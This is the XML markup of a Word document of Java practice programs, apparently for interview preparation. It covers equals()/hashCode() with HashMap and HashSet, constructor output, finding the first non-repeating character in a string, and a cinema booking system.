          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the map.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D20B32"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xing the Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F047A72"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pdated Code with equals() and hashCode() Override:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE51AE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346C46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0CE94F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A92D0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30F5F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758631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4DE2DD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916BB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DD564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14451C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502846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9F45D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46C18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method to compare Employee objects based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A27D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75628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9BF9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B4744F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82E8EE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1D2D0A7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63F722D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0061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96477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method to ensure consistent hashing for equal objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384093D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074A9C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D94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075DD99"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EC8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p>
    <w:p w14:paraId="24F8EE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7CF00C0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ADC9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BD313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41528A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AC642B3"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2F99C4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CEE168F"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4E4249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5CC15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4723CF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1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A7EA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2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFA27E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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9DB8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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C89C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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1CFA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B6DCF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will be 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58483EF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F2C52D" w14:textId="68FA41D0"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DBD7B35"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with Corrected equals() and hashCode() Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023DAB10"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12D82556"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91D0148" w14:textId="77777777" w:rsidR="006A6E00" w:rsidRPr="00CE4B95" w:rsidRDefault="006A6E00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one entry</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will be added to the HashMap, and the size will be 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6D1A4"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his Fix Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E655A0B"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verriding equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F06AD"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CE4B95" w:rsidRDefault="006A6E00" w:rsidP="006A6E00">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6616FBC4" w14:textId="3E5A8D39" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="388" w:name="_Toc197867602"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00113574" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="388"/>
    </w:p>
    <w:p w14:paraId="0C3C9AF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C11F41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7CCC6B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75F0C142"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3032EC3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C9C37A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00107E7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D0E29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F92882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437D8BD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2697DC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40C4078"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512265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456B7C4"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DD4CF5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18222C9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721598D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196215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378AC6E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FE3947"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0E8480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A215D8A"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0D0E34C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7356E7C" w14:textId="70F73910"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7C41FA7" w14:textId="28784A50"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Pr="00CE4B95" w:rsidRDefault="00333842" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618A22C0" w14:textId="77777777" w:rsidR="00333842" w:rsidRPr="00CE4B95" w:rsidRDefault="00333842" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776C8F07" w14:textId="6BE8EAF1"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r code has a couple of issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB7E60C"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Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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mployee Class Doesn't Override equals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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rrected version of the code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBFFCC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ed Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABB19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16D7443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5B601884"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995E7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CA6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009917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A1F01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7B734F"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35E2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1D3F46A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F8611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50C6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CAA429"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to compare Employee objects based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B08AEC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725179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7419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26C251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9D8623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D3B9C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2E1B63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945F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9DB54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to ensure consistent hashing based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693F2BA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7A392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EF495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4DD3C9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B1A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p>
    <w:p w14:paraId="45EDBE5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AC0F3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D04AE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7A4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31DC11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785A4B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2D0BCE2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8F07C5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CDE1A9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E498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C46941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0AABC8B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7B3FD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5BC992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5F03B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2D31EF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8C0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ze will be 1 because all employees are equal based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB79F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3C435E3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2AFB3" w14:textId="3F3BA0C9"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A8197" w14:textId="77777777" w:rsidR="00E65D2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00E65D2E" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD757A3" w14:textId="77777777" w:rsidR="00E65D2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00E65D2E" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685B2011" w14:textId="0D9A7DC3"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA0D49"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lt;Employee&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We have used a HashSet that will store Employee objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C6C94"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mployees to HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B9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481AD9E"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0DEE6D4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e size 1?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2FF55"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the size of the HashSet is 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD41C8A" w14:textId="79E5D57B" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc197867603"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00D97588" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w14:paraId="14EEB56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p>
    <w:p w14:paraId="24B2EA12"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ECA7559"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04DC1B"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D7CCC8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l am in Simple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C027C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1C295A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70F3B60D"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09C0C21"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D8A2E20"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0FC1526" w14:textId="41072029"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9173465" w14:textId="073CBF7A"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Here's the corrected version of your code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68015A"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Corrected Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27391C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F89F90"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E2A08"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 am in Simple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F63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3AA3E3"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DE63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66F439"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p>
    <w:p w14:paraId="71B419ED"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7561" w14:textId="555F572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F77C78"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F06A38"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I am in Simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7627DB61"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72180DCC"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Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The main method creates an instance of the Simple class by calling the constructor Simple().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD64B2A"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Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A41F404" w14:textId="19FEB77E" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="390" w:name="_Toc197867604"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00FD5670" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>First occurrence of non-repeating character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="390"/>
    </w:p>
    <w:p w14:paraId="6AEDC3D5" w14:textId="77777777" w:rsidR="00F52D36" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="00F52D36">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00F52D36" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to find the first occurrence of non-repeating character in String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EC2A8" w14:textId="31761024" w:rsidR="00F52D36" w:rsidRPr="00CE4B95" w:rsidRDefault="00F52D36" w:rsidP="00F52D36">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abbcdec”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AF188" w14:textId="1955F944" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="00F52D36" w:rsidP="00F52D36">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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350AB19" w14:textId="63D7591B"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3488D1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159DB2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38AC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NonRepeatingCharac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43B7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AA11E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BF2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frequency of each character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447870B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89211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6C7CF9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nd update the count of each character in the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74ACD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16FEF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40C55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F727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384E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gain to find the first non-repeating character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5726633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96C8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865E2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first non-repeating character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D7AF0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63633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E2C2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152299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null character if no non-repeating character is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2811F35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C5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BFBB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24E1"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abbcdec"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A948D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40035A1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BA3A14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F363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first non-repeating charact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587F23B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C72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non-repeating character found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9C1F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82ED4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E7DCF0" w14:textId="3FCF67FA"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6CDF67" w14:textId="77777777" w:rsidR="0039191A" w:rsidRPr="00CE4B95" w:rsidRDefault="0039191A" w:rsidP="0039191A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7998C7BE" w14:textId="52752A38" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc197867605"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00D47940" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Cinema Booking System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w14:paraId="32321023" w14:textId="77777777" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75920" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00A514C0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Develop a Java program that models a Cinema Booking System with the following</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A1D05A" w14:textId="6743D792" w:rsidR="00A514C0" w:rsidRPr="00CE4B95" w:rsidRDefault="00295A7A" w:rsidP="00A514C0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00A514C0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>equirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC2EB07" w14:textId="57873AE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An Auditorium containing multiple Screens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBF5FAF" w14:textId="79EC77C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Screen hosts multiple Movie Shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC68507" w14:textId="7FBCEE47"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Movie Show offers seating in three categories: Gold, Silver, and Platinum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7533B636" w14:textId="497A35F6" w:rsidR="00C75920" w:rsidRPr="00CE4B95" w:rsidRDefault="00A514C0" w:rsidP="00A514C0">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Implement functionality to book tickets, check seat availability, and include additional relevant</w:t>
      </w:r>
      <w:r w:rsidR="00DB71EB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>methods to enhance the booking system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE22EED" w14:textId="62D2413F"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590AAC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79F3E0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FED4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F2E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LATINUM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A332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8CA61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E138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0FF4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92AEB3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E8D75D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EDA38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A81C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26506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ly available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC327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9B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5AC80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92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6EF31B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53AD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2938D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ook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75DDA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62C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3AD128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ADE1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is already booked."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BA48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C81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4DF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B80C3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ge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B93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3E7685D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FA99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E3576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F9CD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BA22F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ail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oked]"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DD6C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8F98F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1EC05F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AE6E9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63D3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41F8A4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p>
    <w:p w14:paraId="7AC324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5CA4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03BA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016DD69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DCEB6B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Seats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E44BCD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Seats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0C42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Seats</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5757083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E2F3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101A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p>
    <w:p w14:paraId="6A99444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DC2A4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E0C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p>
    <w:p w14:paraId="163331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FA8B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4E3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p>
    <w:p w14:paraId="689937D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0022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2AEC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D26FF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1D35B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69A253B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719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s:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090357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44147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p>
    <w:p w14:paraId="2ED321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B5616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5B4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72D1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A94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AA4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65D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6FD0F6B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E94F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4A9B10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p>
    <w:p w14:paraId="2CF8FA1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E0B5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Seat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582690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uccessfully booked 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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A76F52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0A8BA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43E0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lready booked."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
